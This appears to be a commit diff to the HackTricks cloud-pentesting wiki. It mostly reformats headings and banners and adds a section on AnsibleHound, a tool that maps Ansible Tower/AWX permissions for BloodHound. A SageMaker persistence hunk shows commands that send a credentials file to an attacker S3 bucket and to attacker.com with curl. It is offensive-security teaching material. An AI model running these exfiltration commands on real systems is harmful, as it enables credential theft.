HackTricks-wiki · carlospolop · Aug 1, 2025 · Aug 1, 2025 · Aug 1, 2025 · Aug 1, 2025
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
@@ -227,6 +227,7 @@
     - [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md)
     - [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md)
     - [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md)
+    - [Aws Sagemaker Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md)
     - [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
     - [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
     - [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)

diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
@@ -136,6 +136,75 @@ From a **white box security** review, you would need the **System Auditor role**
 
 </details>
 
+## Enumeration & Attack-Path Mapping with AnsibleHound
+
+`AnsibleHound` is an open-source BloodHound *OpenGraph* collector written in Go that turns a **read-only** Ansible Tower/AWX/Automation Controller API token into a complete permission graph ready to be analysed inside BloodHound (or BloodHound Enterprise).
+
+### Why is this useful?
+1. The Tower/AWX REST API is extremely rich and exposes **every object and RBAC relationship** your instance knows about.
+2. Even with the lowest privilege (**Read**) token it is possible to recursively enumerate all accessible resources (organisations, inventories, hosts, credentials, projects, job templates, users, teams…).
+3. When the raw data is converted to the BloodHound schema you obtain the same *attack-path* visualisation capabilities that are so popular in Active Directory assessments – but now directed at your CI/CD estate.
+
+Security teams (and attackers!) can therefore:
+* Quickly understand **who can become admin of what**.
+* Identify **credentials or hosts that are reachable** from an unprivileged account.
+* Chain multiple “Read ➜ Use ➜ Execute ➜ Admin” edges to obtain full control over the Tower instance or the underlying infrastructure.
+
+### Prerequisites
+* Ansible Tower / AWX / Automation Controller reachable over HTTPS.
+* A user API token scoped to **Read** only (created from *User Details → Tokens → Create Token → scope = Read*).
+* Go ≥ 1.20 to compile the collector (or use the pre-built binaries).
+
+### Building & Running
+```bash
+# Compile the collector
+cd collector
+go build . -o build/ansiblehound
+
+# Execute against the target instance
+./build/ansiblehound -u "https://tower.example.com/" -t "READ_ONLY_TOKEN"
+```
+Internally AnsibleHound performs *paginated* `GET` requests against (at least) the following endpoints and automatically follows the `related` links returned in every JSON object:
+```
+/api/v2/organizations/
+/api/v2/inventories/
+/api/v2/hosts/
+/api/v2/job_templates/
+/api/v2/projects/
+/api/v2/credentials/
+/api/v2/users/
+/api/v2/teams/
+```
+All collected pages are merged into a single JSON file on disk (default: `ansiblehound-output.json`).
+
+### BloodHound Transformation
+The raw Tower data is then **transformed to BloodHound OpenGraph** using custom nodes prefixed with `AT` (Ansible Tower):
+* `ATOrganization`, `ATInventory`, `ATHost`, `ATJobTemplate`, `ATProject`, `ATCredential`, `ATUser`, `ATTeam`
+
+And edges modelling relationships / privileges:
+* `ATContains`, `ATUses`, `ATExecute`, `ATRead`, `ATAdmin`
+
+The result can be imported straight into BloodHound:
+```bash
+neo4j stop   # if BloodHound CE is running locally
+bloodhound-import ansiblehound-output.json
+```
+
+Optionally you can upload **custom icons** so that the new node types are visually distinct:
+```bash
+python3 scripts/import-icons.py "https://bloodhound.example.com" "BH_JWT_TOKEN"
+```
+
+### Defensive & Offensive Considerations
+* A *Read* token is normally considered harmless but still leaks the **full topology and every credential metadata**. Treat it as sensitive!
+* Enforce **least privilege** and rotate / revoke unused tokens.
+* Monitor the API for excessive enumeration (multiple sequential `GET` requests, high pagination activity).
+* From an attacker perspective this is a perfect *initial foothold → privilege escalation* technique inside the CI/CD pipeline.
+
+## References
+* [AnsibleHound – BloodHound Collector for Ansible Tower/AWX](https://github.com/TheSleekBoyCompany/AnsibleHound)
+* [BloodHound OSS](https://github.com/BloodHoundAD/BloodHound)
+
 {{#include ../banners/hacktricks-training.md}}
 
 

diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
@@ -1,8 +1,10 @@
 # Concourse Architecture
 
+{{#include ../../banners/hacktricks-training.md}}
+
 ## Concourse Architecture
 
-{{#include ../../banners/hacktricks-training.md}}
+
 
 [**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
 
@@ -38,4 +40,3 @@ In order to execute tasks concourse must have some workers. These workers **regi
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
@@ -1,8 +1,10 @@
 # Concourse Enumeration & Attacks
 
+{{#include ../../banners/hacktricks-training.md}}
+
 ## Concourse Enumeration & Attacks
 
-{{#include ../../banners/hacktricks-training.md}}
+
 
 ### User Roles & Permissions
 
@@ -437,9 +439,8 @@ Accept-Encoding: gzip.
 
 ## References
 
-- https://concourse-ci.org/vars.html
+- [https://concourse-ci.org/vars.html](https://concourse-ci.org/vars.html)
 
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
diff --git a/...g-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/...g-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
@@ -1,5 +1,5 @@
 # Gh Actions - Artifact Poisoning
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/...ting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/...ting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
@@ -1,5 +1,5 @@
 # GH Actions - Cache Poisoning
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/.../github-security/abusing-github-actions/gh-actions-context-script-injections.md b/.../github-security/abusing-github-actions/gh-actions-context-script-injections.md
@@ -1,5 +1,5 @@
 # Gh Actions - Context Script Injections
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md
@@ -1,5 +1,5 @@
 # AWS - Persistence
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md
@@ -1,5 +1,6 @@
+# Aws Sagemaker Persistence
 
-# AWS - SageMaker Lifecycle Configuration Persistence
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Overview of Persistence Techniques
 
@@ -157,3 +158,4 @@ aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
 
 curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
 ```
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
@@ -1,5 +1,5 @@
 # AWS - Post Exploitation
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md
@@ -35,3 +35,4 @@ However, a **bypass** has been identified where an attacker with sufficient perm
 **Summary:**
 
 This vulnerability allows an attacker with sufficient AWS IAM permissions to recover previously detected secrets even after the original file has been deleted from S3. If an AWS secret key, access token, or other sensitive credential is exposed, an attacker could leverage this flaw to retrieve it and gain unauthorized access to AWS resources. This could lead to privilege escalation, unauthorized data access, or further compromise of cloud assets, resulting in data breaches and service disruptions.
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/...pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/...pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
@@ -1,8 +1,10 @@
 # AWS - Sagemaker Privesc
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 ## AWS - Sagemaker Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
+
 
 ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
 
@@ -114,4 +116,3 @@ _I haven't exploited because of the lack of time, but looks similar to the previ
 {{#include ../../../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
@@ -1,5 +1,7 @@
 # AWS - WorkDocs Privesc
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 ## WorkDocs
 
 For more info about WorkDocs check:
@@ -54,3 +56,4 @@ I didn't find any way to do this from the cli.
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
@@ -1,12 +1,10 @@
 # AWS - ECR Enum
 
-## AWS - ECR Enum
-
 {{#include ../../../banners/hacktricks-training.md}}
 
-### ECR
+## ECR
 
-#### Basic Information
+### Basic Information
 
 Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.
 
@@ -47,7 +45,7 @@ These are the **images** that in the **private registry** or to the **public** o
 
 <figure><img src="../../../images/image (280).png" alt=""><figcaption></figcaption></figure>
 
-#### Enumeration
+### Enumeration
 
 ```bash
 # Get repos
@@ -69,27 +67,27 @@ aws ecr get-registry-policy
 aws ecr get-repository-policy --repository-name <repo_name>
 ```
 
-#### Unauthenticated Enum
+### Unauthenticated Enum
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
 {{#endref}}
 
-#### Privesc
+### Privesc
 
 In the following page you can check how to **abuse ECR permissions to escalate privileges**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-ecr-privesc.md
 {{#endref}}
 
-#### Post Exploitation
+### Post Exploitation
 
 {{#ref}}
 ../aws-post-exploitation/aws-ecr-post-exploitation.md
 {{#endref}}
 
-#### Persistence
+### Persistence
 
 {{#ref}}
 ../aws-persistence/aws-ecr-persistence.md
@@ -103,4 +101,3 @@ In the following page you can check how to **abuse ECR permissions to escalate p
 
 
 
-
diff --git a/...g-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/...g-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
@@ -1,5 +1,5 @@
 # AWS - Security & Detection Services
 
-
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
diff --git a/...security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/...security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
@@ -1,10 +1,9 @@
 # AWS - Inspector Enum
 
-## AWS - Inspector Enum
-
 {{#include ../../../../banners/hacktricks-training.md}}
 
-### Inspector
+
+## Inspector
 
 Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management.
 
@@ -387,4 +386,3 @@ aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
 
 
 
-
diff --git a/...ty/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/...ty/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
@@ -1,7 +1,5 @@
 # AWS - Trusted Advisor Enum
 
-## AWS - Trusted Advisor Enum
-
 {{#include ../../../../banners/hacktricks-training.md}}
 
 ## AWS Trusted Advisor Overview
@@ -72,4 +70,3 @@ AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, perform
 
 
 
-
diff --git a/...d/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/...d/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
@@ -1,7 +1,5 @@
 # AWS - WAF Enum
 
-## AWS - WAF Enum
-
 {{#include ../../../../banners/hacktricks-training.md}}
 
 ## AWS WAF
@@ -472,4 +470,3 @@ aws wafv2 untag-resource --resource-arn <value> --tag-keys <value>
 
 
 
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
@@ -1,7 +1,5 @@
 # AWS - EventBridge Scheduler Enum
 
-## EventBridge Scheduler
-
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## EventBridge Scheduler
@@ -82,4 +80,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis
 
 
 
-
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md
@@ -1,5 +1,5 @@
 # Az - Post Exploitation
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/...cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/...cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md
@@ -19,3 +19,4 @@ For more information about function apps check:
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md
@@ -1,5 +1,5 @@
 # Az - Privilege Escalation
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
@@ -1,5 +1,4 @@
-
-# Az - Static Web Apps
+# Az Static Web Apps
 
 {{#include ../../../banners/hacktricks-training.md}}
 
@@ -202,4 +201,3 @@ All the information about privilege escalation and post exploitation in Azure St
 - [https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans](https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md b/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
@@ -1,5 +1,7 @@
 # GCP - Permissions for a Pentest
 
+{{#include ../../banners/hacktricks-training.md}}
+
 If you want to pentest a GCP environment you need to ask for enough permissions to **check all or most of the services** used in **GCP**. Ideally, you should ask the client to create:
 
 * **Create** a new **project**
@@ -144,3 +146,4 @@ roles/bigquery.metadataViewer
 ```
 
 
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/README.md b/src/pentesting-cloud/gcp-security/gcp-persistence/README.md
@@ -1,5 +1,5 @@
 # GCP - Persistence
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
@@ -1,5 +1,5 @@
 # GCP - Post Exploitation
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/...oud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md b/...oud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
@@ -128,3 +128,4 @@ def injection():
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
		@@ -1,5 +1,5 @@
		# Gh Actions - Artifact Poisoning


		{{#include ../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
		@@ -1,5 +1,5 @@
		# GH Actions - Cache Poisoning


		{{#include ../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
		@@ -1,5 +1,5 @@
		# Gh Actions - Context Script Injections


		{{#include ../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
		@@ -1,5 +1,5 @@
		# AWS - Persistence


		{{#include ../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
		@@ -1,5 +1,5 @@
		# AWS - Post Exploitation


		{{#include ../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
Expand Up		@@ -35,3 +35,4 @@ However, a bypass has been identified where an attacker with sufficient perm
		Summary:

		This vulnerability allows an attacker with sufficient AWS IAM permissions to recover previously detected secrets even after the original file has been deleted from S3. If an AWS secret key, access token, or other sensitive credential is exposed, an attacker could leverage this flaw to retrieve it and gain unauthorized access to AWS resources. This could lead to privilege escalation, unauthorized data access, or further compromise of cloud assets, resulting in data breaches and service disruptions.
		{{#include ../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
		@@ -1,5 +1,5 @@
		# AWS - Security & Detection Services


		{{#include ../../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
		@@ -1,5 +1,5 @@
		# Az - Post Exploitation


		{{#include ../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
Expand Up		@@ -19,3 +19,4 @@ For more information about function apps check:



		{{#include ../../../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
		@@ -1,5 +1,5 @@
		# Az - Privilege Escalation


		{{#include ../../../banners/hacktricks-training.md}}